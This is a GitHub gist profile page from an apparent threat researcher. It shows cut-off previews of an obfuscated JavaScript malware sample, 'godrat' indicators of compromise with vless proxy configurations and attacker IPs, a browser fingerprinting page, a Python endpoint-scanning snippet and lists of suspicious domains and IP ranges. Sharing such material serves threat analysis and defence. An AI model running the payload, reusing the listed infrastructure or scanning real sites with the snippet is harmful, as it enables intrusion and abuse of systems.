Skip to content

Instantly share code, notes, and snippets.

View notnci's full-sized avatar

fopwn notnci

View GitHub Profile
@notnci
notnci / malware_js.js
Created January 29, 2024 16:38
because pastebin sucks
/*208.115.233.154/*/
var _0xa07b = ["wqQrw7bDoQ9CAzbDv8K9JxnDt8KOw57Dm8KvEMOWIMKHwoXCi8KhBcKveU14wqcCI17DjG0XwonDqWPCrsK/W8KldsKPTzDDrFF0V8OwwrDDrMKIwoggw7zCo2NWw49aWw7Dj2RXw40SEWZca8KiGDsfwpJ2w4YBB8Ogw40uwqbCuWk8LiHDnnzDksOjdMKASB8kAMKOw7XDtjhPbMOswr4owo4ueMO7RQbCuxVZw6nDknFAw6g+RwM7RcOoa8KXODnCtMKTE8OJw45jwpZyw7vCocOYSsKAVsKCGMKUw7fCqcOdcR4GYx8ew4NkT8K+RUEpAE1+w6HDk8KfD0TDscOVwoTCpcK8wrvCjRpwNQjDg0LDiyYowo5SQj7ClksgwqfChcORYFTDqAvDlsK/Wl/CqmPDsXLDh1DCkcOVw5zCq8ObwowyRzrDmhs3w4DCisKxF2HDmVPDp8KxFsO5UUcuwpbDu0sHw7jCi8KjwpDCmXjDjSw5w5QhwpTCn8OLw68NJ1PCmQ/DiQ07wq7DsMOyIxDDkmfDssOiC8KSU0dOwq/CuMKyw4pkfMKrw710w5Naw7vDlcKwwo7CoW4FHAc9w4XDn3zCiMKvPVY9SsOmJ8KlHsKKw40CwrvDvwbCiMKWw57DiH3DuMKsw5VuwrDDuFbDuMKmw6jDncKiVDEtwpLCpsOSDCUta0xHWgnCp3vDsB3Cq8KTPAoRGDc6K8OfTBw3w7ArwqMPw6nDuF5lw5bCsMK/Ml3DvsKPGEwvw6zCuMOyccK4ATfCtWzDun/ClQfDlMKnYMK2wqUSw54iGyfDnUlKwqPDlloGA8K+JcKuwpDDq2bCtsKYIMOCwrwIVzZhwoRTw7RCwoUpwpPCjGgpZj5hw7dfKWnDoMKPw7DCmnvDgXdAdMKZw47CvMKYw53DtHrDq8KNNh3CgsO6w5kZWsKfBgpywqQmXVwBM8KhZ8Ocw57DsMOBw71rSELDg
@notnci
notnci / 7mordad.txt
Created January 27, 2024 02:55
godrat IOCs
65[.]109[.]241[.]216:8059/7mordad.txt
vless://4fcfd6cb-2e12-4904-b032-62ee527d4d43@ss.mcinet1.sbs:8443?mode=gun&security=tls&encryption=none&alpn=h2,http/1.1&type=grpc&serviceName=@NT_Safe&sni=c.godrat.sbs#-7%D9%85%D8%B1%D8%AF%D8%A7%D8%AF+%D9%87%D9%85%D8%B1%D8%A7%D9%87+%DA%A9%D9%85%DA%A9%DB%8C
vless://0045581f-73eb-4691-ecc8-d17519fd9dd4@128.140.119.173:18336?type=tcp&path=%2F&host=telewebion.com&headerType=http#Bala-7%D9%85%D8%B1%D8%AF%D8%A7%D8%AF
vless://699cbcc0-0125-4d1b-f280-859688ca307c@65.109.240.178:51245?type=tcp&path=%2F&host=telewebion.com&headerType=http#30be%20bala-7%D9%85%D8%B1%D8%AF%D8%A7%D8%AF
vless://3f25d6c3-30e7-4c6a-e435-c106e8a3f763@xz.mmdpc.online:443?security=none&encryption=none&host=zula.ir&headerType=http&type=tcp#%D8%AA%D9%85%D8%AF%DB%8C%D8%AF-13%D9%85%D8%B1%D8%AF%D8%A7%D8%AF+%D9%87%D9%85%D8%B1%D8%A7%D9%87
vless://5f2ebd72-cd06-49a7-aaab-e543890d0e49@go.panke9.site:44554?type=tcp&path=%2F&host=speedtest.net&headerType=http#-7%20%D9%85%D8%B1%D8%AF%D8%A7%D8%AF%20%D9%87%D9%85%D8%B1%D8
@notnci
notnci / fingerprint.html
Created January 27, 2024 00:37
this one seems interesting
<html>
<head>
<title></title>
<script type="text/javascript" src="/javascript/jscheck.js"></script>
<script type="text/javascript" src="/javascript/swfobject.js"></script>
<script type="text/javascript" src="/javascript/fingerprint/iife.min.js"></script>
<script type="text/javascript">
var canvas = document.createElement('canvas');
var gl;
def scan_endpoints(client, url, endpoints, jsond, df=True):
filename = url[url.find("://") + 3:-11]
data = []
with open(f"{filename}.txt", "w+") as wf:
for item in endpoints:
try:
r = client.get(f"{url}" + str(item), headers=h)
if r.status_code == 200:
print(f"[+] Valid page found: {url}{str(item)} [+]")
if df:
@notnci
notnci / cam-hosts.txt
Created January 27, 2022 16:21
domains extracted from the campaignhall obfuscated script
http://pv.sohu.com/cityjson?ie=utf-8');
https://qy816.vip
https://long8581.com
https://lh9658.com/
http://m.wafbet.org/aff.php?vid=1054841
https://m.288ysb.com/registration.aspx?aff=2889105866
https://www.288ysb.com/registration.aspx?aff=2889105866
https://jjblove.net/seo?tarob308
https://buyball1.com
https://418ld.com/
@notnci
notnci / ips.js
Created January 26, 2022 22:03
decoded ip list from deli-shimane
const ip_list = [
["1.51.120.0", "1.51.127.255"],
["36.5.0.0", "36.5.255.255"],
["36.7.64.0", "36.7.191.255"],
["36.32.0.0", "36.32.63.255"],
["36.33.0.0", "36.33.47.255"],
["36.33.216.0", "36.33.247.255"],
["36.34.0.0", "36.34.23.255"],
["36.35.0.0", "36.35.31.255"],
["36.35.248.0", "36.35.249.255"],
@notnci
notnci / keybase.md
Created March 15, 2021 19:53
keybase

Keybase proof

I hereby claim:

  • I am notnci on github.
  • I am spekktre (https://keybase.io/spekktre) on keybase.
  • I have a public key ASBn3LEiliLxU9aNP46i1jxLaUprA1fC7BNYN3WqwKq-QAo

To claim this, I am signing this object: